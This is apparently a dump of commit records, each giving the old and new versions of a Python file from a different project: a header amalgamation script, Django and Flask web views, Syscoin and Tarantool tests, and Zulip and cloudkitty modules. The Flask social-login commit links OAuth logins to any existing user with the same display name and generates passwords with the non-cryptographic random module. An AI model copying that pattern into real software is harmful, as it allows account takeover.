print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| import sys
import os.path, re, StringIO
blacklist = [
'Windows.h',
'mach/clock.h', 'mach/mach.h',
'malloc.h',
'glog/logging.h', 'io/azure_filesys.h', 'io/hdfs_filesys.h', 'io/s3_filesys.h',
'sys/stat.h', 'sys/types.h',
'omp.h'
]
def get_sources(def_file):
sources = []
files = []
visited = set()
mxnet_path = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
for line in open(def_file):
files = files + line.strip().split(' ')
for f in files:
f = f.strip()
if not f or f.endswith('.o:') or f == '\\': continue
fn = os.path.relpath(f)
if os.path.abspath(f).startswith(mxnet_path) and fn not in visited:
sources.append(fn)
visited.add(fn)
return sources
sources = get_sources(sys.argv[1])
def find_source(name, start):
candidates = []
for x in sources:
if x == name or x.endswith('/' + name): candidates.append(x)
if not candidates: return ''
if len(candidates) == 1: return candidates[0]
for x in candidates:
if x.split('/')[1] == start.split('/')[1]: return x
return ''
re1 = re.compile('<([./a-zA-Z0-9_-]*)>')
re2 = re.compile('"([./a-zA-Z0-9_-]*)"')
sysheaders = []
history = set([])
out = StringIO.StringIO()
def expand(x, pending):
if x in history and x not in ['mshadow/mshadow/expr_scalar-inl.h']: # MULTIPLE includes
return
if x in pending:
#print 'loop found: %s in ' % x, pending
return
print >>out, "//===== EXPANDING: %s =====\n" %x
for line in open(x):
if line.find('#include') < 0:
out.write(line)
continue
if line.strip().find('#include') > 0:
print line
continue
m = re1.search(line)
if not m: m = re2.search(line)
if not m:
print line + ' not found'
continue
h = m.groups()[0].strip('./')
source = find_source(h, x)
if not source:
if (h not in blacklist and
h not in sysheaders and
'mkl' not in h and
'nnpack' not in h): sysheaders.append(h)
else:
expand(source, pending + [x])
print >>out, "//===== EXPANDED: %s =====\n" %x
history.add(x)
expand(sys.argv[2], [])
f = open(sys.argv[3], 'wb')
for k in sorted(sysheaders):
print >>f, "#include <%s>" % k
print >>f, ''
print >>f, out.getvalue()
for x in sources:
if x not in history and not x.endswith('.o'):
print 'Not processed:', x
| Python | 0.000001 |
7fabbbb6562f068690b7971c6ea1299172400d73 | fix `make run_importer_jobs` | labonneboite/importer/conf/development.py | labonneboite/importer/conf/development.py | # --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 20000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
| # --- job 1/8 & 2/8 : check_etablissements & extract_etablissements
DISTINCT_DEPARTEMENTS_HAVING_OFFICES = 15
# --- job 5/8 : compute_scores
MINIMUM_OFFICES_REQUIRED_TO_TRAIN_MODEL = 0
RMSE_MAX = 5000
MAXIMUM_COMPUTE_SCORE_JOB_FAILURES = 94 # 96 departements == 2 successes + 94 failures
# --- job 6/8 : validate_scores
SCORE_REDUCING_MINIMUM_THRESHOLD = 0
DEPARTEMENTS_TO_BE_SANITY_CHECKED = ['14', '69']
| Python | 0 |
51129edea0a10a5799f329443b196e930a591fb9 | Move down timezone module. | laundryapp/templatetags/laundryapptags.py | laundryapp/templatetags/laundryapptags.py | from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from django.utils import timezone
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
user = context['request'].user
addable = CHECK_EVENT_PERM_FUNC(None, user)
if 'calendar' in context:
addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
context['addable'] = addable
day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
# get slots to display on the left
slots = _cook_slots(day_part, increment)
context['slots'] = slots
return context
def _cook_slots(period, increment):
"""
Prepare slots to be displayed on the left hand side
calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
| from schedule.conf.settings import CHECK_EVENT_PERM_FUNC, CHECK_CALENDAR_PERM_FUNC
from schedule.templatetags.scheduletags import querystring_for_date
from django.conf import settings
from django import template
from django.core.urlresolvers import reverse
from django.utils import timezone
from django.utils.safestring import mark_safe
from schedule.conf.settings import SCHEDULER_PREVNEXT_LIMIT_SECONDS
register = template.Library()
from pytz import timezone
import datetime
import sys
@register.inclusion_tag("schedule/_daily_table.html", takes_context=True)
def laundryapp_daily_table(context, day, start=6, end=23, increment=60):
    # Build the daily-table context: whether the current user may add events,
    # plus the list of display slots between hours *start* and *end*.
    user = context['request'].user
    addable = CHECK_EVENT_PERM_FUNC(None, user)
    if 'calendar' in context:
        addable &= CHECK_CALENDAR_PERM_FUNC(context['calendar'], user)
    context['addable'] = addable
    # Restrict the day to the displayed hour range before slicing into slots.
    day_part = day.get_time_slot(day.start + datetime.timedelta(hours=start), day.start + datetime.timedelta(hours=end))
    # get slots to display on the left
    slots = _cook_slots(day_part, increment)
    context['slots'] = slots
    return context
def _cook_slots(period, increment):
"""
Prepare slots to be displayed on the left hand side
calculate dimensions (in px) for each slot.
Arguments:
period - time period for the whole series
increment - slot size in minutes
"""
tdiff = datetime.timedelta(minutes=increment)
num = int((period.end - period.start).total_seconds()) // int(tdiff.total_seconds())
s = period.start
slots = []
for i in range(num):
sl = period.get_time_slot(s, s + tdiff)
slots.append(sl)
s = s + tdiff
return slots
@register.inclusion_tag("schedule/_create_event_options.html", takes_context=True)
def laundryapp_create_event_url(context, calendar, slot):
print >> sys.stderr, "In laundryapp templatetags!"
context.update({
'calendar': calendar,
'MEDIA_URL': getattr(settings, "MEDIA_URL"),
})
lookup_context = {
'calendar_slug': calendar.slug,
}
settings_timezone = timezone(settings.TIME_ZONE)
slot = slot.astimezone(settings_timezone)
context['laundryapp_create_event_url'] = "%s%s" % (
reverse("calendar_create_event", kwargs=lookup_context),
querystring_for_date(slot))
return context
@register.simple_tag
def prev_url(target, calendar, period):
now = timezone.now()
delta = now - period.prev().start
slug = calendar.slug
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-left"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.prev().start)))
@register.simple_tag
def next_url(target, calendar, period):
now = timezone.now()
slug = calendar.slug
delta = period.next().start - now
if delta.total_seconds() > SCHEDULER_PREVNEXT_LIMIT_SECONDS:
return ''
return mark_safe('<a href="%s%s" class="btn btn-default btn-lg"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>' % (
reverse(target, kwargs=dict(calendar_slug=slug)),
querystring_for_date(period.next().start)))
| Python | 0 |
3cefa75b8e9012d828453a764c0b169ab169fae6 | fix google login names; associate with any user with same name | chip_friends/security.py | chip_friends/security.py | from __future__ import unicode_literals
import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
    # OAuth login failed because no local user is connected yet: find or
    # create a User by display name, attach the OAuth connection, log in.
    connection_values = get_connection_values_from_oauth_response(
        provider, oauth_response)
    name = connection_values['full_name']
    # Google returns the full name as a dict; flatten it to "given family".
    if isinstance(name, dict):
        try:
            name = '{} {}'.format(name['givenName'], name['familyName'])
        except (ValueError, KeyError):
            pass
    # Placeholder password -- the account is only ever used via OAuth.
    # NOTE(review): random is not a CSPRNG; consider the secrets module.
    password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
    user, new = User.get_or_create(
        name=name, defaults={'email': '', 'password': password})
    # don't bother using the datastore, just use the model
    connection_values['user_id'] = user.id
    connect_handler(connection_values, provider)
    login_user(user)
    db.commit()
    return render_template('index.html')
| import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
connection_values = get_connection_values_from_oauth_response(
provider, oauth_response)
ds = app.security.datastore
password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
user = ds.create_user(
email='', password=password, name=connection_values['full_name'])
ds.commit()
connection_values['user_id'] = user.id
connect_handler(connection_values, provider)
login_user(user)
db.commit()
return render_template('index.html')
| Python | 0 |
5836b48bbfa87ba706e6ddcb267dc375678695a8 | use str | test/functional/feature_asset_burn.py | test/functional/feature_asset_burn.py | #!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
    """Functional test for burning a SYS asset allocation."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.rpc_timeout = 240
        self.extra_args = [['-assetindex=1'], ['-assetindex=1']]

    def run_test(self):
        self.nodes[0].generate(200)
        self.sync_blocks()
        self.basic_burn_syscoin()
        # NOTE(review): basic_audittxroot1 is not defined in this class --
        # presumably inherited from the framework base class; confirm.
        self.basic_audittxroot1()

    def basic_burn_syscoin(self):
        """Create an asset, fund an address with 0.5, then burn it all."""
        self.basic_asset()
        self.nodes[0].generate(1)
        newaddress = self.nodes[0].getnewaddress()
        self.nodes[0].assetsend(self.asset, newaddress, '0.5')
        self.nodes[0].generate(1)
        out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
        assert_equal(len(out), 1)
        # Try to burn more than we own. Bug fix: pass the RPC method and its
        # arguments to assert_raises_rpc_error instead of invoking it inline;
        # the inline call raised before the assertion helper could catch it.
        assert_raises_rpc_error(-20, 'Failed to read from asset DB',
                                self.nodes[0].assetallocationburn,
                                self.asset, newaddress, '0.6',
                                '0x931d387731bbbc988b312206c74f77d004d6b84b')
        self.nodes[0].assetallocationburn(self.asset, newaddress, '0.5', '0x931d387731bbbc988b312206c74f77d004d6b84b')
        self.nodes[0].generate(1)
        # The whole allocation was burned, so no asset UTXOs remain.
        out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
        assert_equal(len(out), 0)

    def basic_asset(self):
        """Create the test asset and remember its guid."""
        self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
| #!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 240
self.extra_args = [['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(200)
self.sync_blocks()
self.basic_burn_syscoin()
self.basic_audittxroot1()
def basic_burn_syscoin(self):
self.basic_asset()
self.nodes[0].generate(1)
newaddress = self.nodes[0].getnewaddress()
self.nodes[0].assetsend(self.asset, newaddress, 0.5)
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 1)
# try to burn more than we own
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetallocationburn(self.asset, newaddress, 0.6, '0x931d387731bbbc988b312206c74f77d004d6b84b'))
self.nodes[0].assetallocationburn(self.asset, newaddress, 0.5, '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 0)
def basic_asset(self):
self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
| Python | 0.000001 |
9d2766a7b6aae9e3ad3c94925bdde100a70f6150 | fix debug_view function | src/psd_tools/debug.py | src/psd_tools/debug.py | # -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import, print_function
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
    """
    Print up to *max_back* bytes before and 100 bytes after the current
    position of file pointer ``fp``, restoring the original position.
    """
    pos = fp.tell()
    # Never seek before the start of the file.
    back = max_back if max_back < pos else pos
    fp.seek(-back, 1)
    before = fp.read(back)
    after = fp.read(100)
    fp.seek(-100, 1)
    print(txt, repr(before), "--->.<---", repr(after))
def pretty_namedtuple(typename, field_names, verbose=False):
    """
    Return a namedtuple class that knows how to pretty-print itself
    using IPython.lib.pretty library; if IPython is not installed
    then this function is the same as collections.namedtuple
    (with one exception: 'rename' argument is unsupported).
    """
    # NOTE(review): namedtuple's positional `verbose` argument was removed in
    # Python 3.9 -- confirm the supported Python range for this module.
    cls = namedtuple(typename, field_names, verbose)
    if _PRETTY_ENABLED:
        # Put the pretty-printing mixin ahead of the namedtuple base so its
        # _repr_pretty_ wins in the MRO.
        PrettyMixin = _get_pretty_mixin(typename)
        cls = type(str(typename), (PrettyMixin, cls), {})
    # For pickling to work, the __module__ variable needs to be set to the frame
    # where the named tuple is created. Bypass this step in enviroments where
    # sys._getframe is not defined (Jython for example) or sys._getframe is not
    # defined for arguments greater than 0 (IronPython).
    try:
        cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
    except (AttributeError, ValueError):
        pass
    return cls
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
| # -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
"""
Print file contents around current position for file pointer ``fp``
"""
max_back = min(max_back, fp.tell())
fp.seek(-max_back, 1)
pre = fp.read(max_back)
post = fp.read(100)
fp.seek(-100, 1)
print(txt, repr(pre), "--->.<---", repr(post))
def pretty_namedtuple(typename, field_names, verbose=False):
"""
Return a namedtuple class that knows how to pretty-print itself
using IPython.lib.pretty library; if IPython is not installed
then this function is the same as collections.namedtuple
(with one exception: 'rename' argument is unsupported).
"""
cls = namedtuple(typename, field_names, verbose)
if _PRETTY_ENABLED:
PrettyMixin = _get_pretty_mixin(typename)
cls = type(str(typename), (PrettyMixin, cls), {})
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return cls
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
| Python | 0.000021 |
2bc1cd6ab4be134758edcc8739b89ce4984131b4 | Fix overly large try/except block. | zerver/management/commands/create_user.py | zerver/management/commands/create_user.py | import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
    help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
    def add_arguments(self, parser: argparse.ArgumentParser) -> None:
        # Standard create-user options plus a required --realm.
        self.add_create_user_args(parser)
        self.add_realm_args(
            parser, required=True, help="The name of the existing realm to which to add the user."
        )
    def handle(self, *args: Any, **options: Any) -> None:
        realm = self.get_realm(options)
        assert realm is not None  # Should be ensured by parser
        # Prompt interactively for any identity fields not passed as options.
        if "email" not in options:
            email = input("Email: ")
        else:
            email = options["email"]
        try:
            validators.validate_email(email)
        except ValidationError:
            raise CommandError("Invalid email address.")
        if "full_name" not in options:
            full_name = input("Full name: ")
        else:
            full_name = options["full_name"]
        # Password precedence: --password-file, then --password, then a
        # generated (dev) or disabled (prod) initial password.
        if options["password_file"] is not None:
            with open(options["password_file"]) as f:
                pw: Optional[str] = f.read().strip()
        elif options["password"] is not None:
            logging.warning(
                "Passing password on the command line is insecure; prefer --password-file."
            )
            pw = options["password"]
        else:
            # initial_password will return a random password that
            # is a salted hash of the email address in a
            # development environment, and None in a production
            # environment.
            user_initial_password = initial_password(email)
            if user_initial_password is None:
                logging.info("User will be created with a disabled password.")
            else:
                assert settings.DEVELOPMENT
                logging.info("Password will be available via `./manage.py print_initial_password`.")
            pw = user_initial_password
        try:
            do_create_user(
                email,
                pw,
                realm,
                full_name,
                # Explicitly set tos_version=None. For servers that
                # have configured Terms of Service, this means that
                # users created via this mechanism will be prompted to
                # accept the Terms of Service on first login.
                tos_version=None,
                acting_user=None,
            )
        except IntegrityError:
            raise CommandError("User already exists.")
| import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
self.add_create_user_args(parser)
self.add_realm_args(
parser, required=True, help="The name of the existing realm to which to add the user."
)
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
if "email" not in options:
email = input("Email: ")
else:
email = options["email"]
try:
validators.validate_email(email)
except ValidationError:
raise CommandError("Invalid email address.")
if "full_name" not in options:
full_name = input("Full name: ")
else:
full_name = options["full_name"]
try:
if options["password_file"] is not None:
with open(options["password_file"]) as f:
pw: Optional[str] = f.read().strip()
elif options["password"] is not None:
logging.warning(
"Passing password on the command line is insecure; prefer --password-file."
)
pw = options["password"]
else:
# initial_password will return a random password that
# is a salted hash of the email address in a
# development environment, and None in a production
# environment.
user_initial_password = initial_password(email)
if user_initial_password is None:
logging.info("User will be created with a disabled password.")
else:
assert settings.DEVELOPMENT
logging.info(
"Password will be available via `./manage.py print_initial_password`."
)
pw = user_initial_password
do_create_user(
email,
pw,
realm,
full_name,
# Explicitly set tos_version=None. For servers that
# have configured Terms of Service, this means that
# users created via this mechanism will be prompted to
# accept the Terms of Service on first login.
tos_version=None,
acting_user=None,
)
except IntegrityError:
raise CommandError("User already exists.")
| Python | 0 |
b2b19d5bd608db9286448000e1c998784139a614 | update join | classmate_party/views.py | classmate_party/views.py | # -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
    # Landing page; locals() exposes `request` to the template context.
    return render_to_response('index.html', locals())
def join(request):
    # Sign-up view: on POST, validate the form, resize and store the uploaded
    # photo, then create/update a Person row per selected category.
    msg = ''
    category_choice = Person.CATEGORY_CHOICE
    if request.method == 'POST':
        categorys = request.POST.getlist('category')
        name = request.POST.get('name')
        phone_num = request.POST.get('phone_num')
        pic = request.FILES.get('pic')
        location1 = request.POST.get('location1', '')
        location2 = request.POST.get('location2', '')
        location = location1 + ' ' + location2
        # Validation: category, name and phone are all required.
        if not categorys:
            msg = u'请勾选报名项目'
        elif not name:
            msg = u'请填写姓名'
        elif not phone_num:
            msg = u'请填写手机号'
        else:
            try:
                # Scale the photo down so its height is at most 500px,
                # preserving aspect ratio, and save it under a random name.
                im = Image.open(pic)
                w, h = im.size
                if h > 500:
                    r = h / 500.0
                    w = int(w / r)
                    h = int(h / r)
                    im = im.resize((w, h))
                filename = "static/header/%s.png" % uuid.uuid4()
                path = os.path.join(os.getcwd(), filename)
                im.save(path)
                pic_url = '/' + filename
                # Ensure a Person exists for each newly selected category.
                modify_persons = []
                for category in categorys:
                    person, created = Person.objects.get_or_create(category=category, name=name)
                    modify_persons.append(person)
                # Sync contact fields on every row sharing this name; only
                # rows for the just-selected categories bump update_time.
                for person in Person.objects.filter(name=name):
                    update_fields = ['phone_num', 'pic_url', 'location']
                    if person in modify_persons:
                        update_fields.append('update_time')
                        # Touch the row first so auto_now update_time changes.
                        person.phone_num = ''
                        person.save()
                    person.phone_num = phone_num
                    person.pic_url = pic_url
                    person.location = location
                    person.save(update_fields=update_fields)
                success = True
            except:
                # NOTE(review): bare except hides all errors behind a generic
                # "bad photo" message -- consider narrowing to IOError.
                msg = u'请上传一张您的近期照片'
    return render_to_response('join.html', locals())
def list_persons(request):
    # Build one group per category: display name, queryset and count.
    rs = []
    for category, category_display in Person.CATEGORY_CHOICE:
        r = {}
        r['category_display'] = category_display
        r['persons'] = Person.objects.filter(category=category).order_by('update_time')
        # NOTE(review): assigns the bound method, not its result; the Django
        # template engine calls it on access -- confirm, or use .count().
        r['count'] = r['persons'].count
        rs.append(r)
    return render_to_response('list_persons.html', locals())
| # -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
return render_to_response('index.html', locals())
def join(request):
msg = ''
category_choice = Person.CATEGORY_CHOICE
if request.method == 'POST':
categorys = request.POST.getlist('category')
name = request.POST.get('name')
phone_num = request.POST.get('phone_num')
pic = request.FILES.get('pic')
location1 = request.POST.get('location1', '')
location2 = request.POST.get('location2', '')
location = location1 + ' ' + location2
if not categorys:
msg = u'请勾选报名项目'
elif not name:
msg = u'请填写姓名'
elif not phone_num:
msg = u'请填写手机号'
else:
try:
im = Image.open(pic)
w, h = im.size
if h > 500:
r = h / 500.0
w = int(w / r)
h = int(h / r)
im = im.resize((w, h))
filename = "static/header/%s.png" % uuid.uuid4()
path = os.path.join(os.getcwd(), filename)
im.save(path)
pic_url = '/' + filename
for category in categorys:
person, created = Person.objects.get_or_create(category=category, name=name)
Person.objects.filter(name=name).update(
phone_num=phone_num,
pic_url=pic_url,
location=location
)
success = True
except:
msg = u'请上传一张您的近期照片'
return render_to_response('join.html', locals())
def list_persons(request):
rs = []
for category, category_display in Person.CATEGORY_CHOICE:
r = {}
r['category_display'] = category_display
r['persons'] = Person.objects.filter(category=category).order_by('update_time')
r['count'] = r['persons'].count
rs.append(r)
return render_to_response('list_persons.html', locals())
| Python | 0 |
5e991fd00d980884f9210cfd5f25d5e7d91aabfc | Fix race condition in #144 | test/replication/init_storage.test.py | test/replication/init_storage.test.py | import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must be failed)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
lsn = master.get_param('lsn')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
replica.wait_lsn(lsn)
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
| import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must be failed)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
| Python | 0 |
0ea32a2b51438b55130082e54f30fc9c97bd9d85 | Fix compatibility with oslo.db 12.1.0 | cloudkitty/db/__init__.py | cloudkitty/db/__init__.py | # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
    """Create the module-level EngineFacade on first use and cache it."""
    global _FACADE
    if _FACADE is None:
        # FIXME(priteau): Remove autocommit=True (and ideally use of
        # LegacyEngineFacade) asap since it's not compatible with SQLAlchemy
        # 2.0.
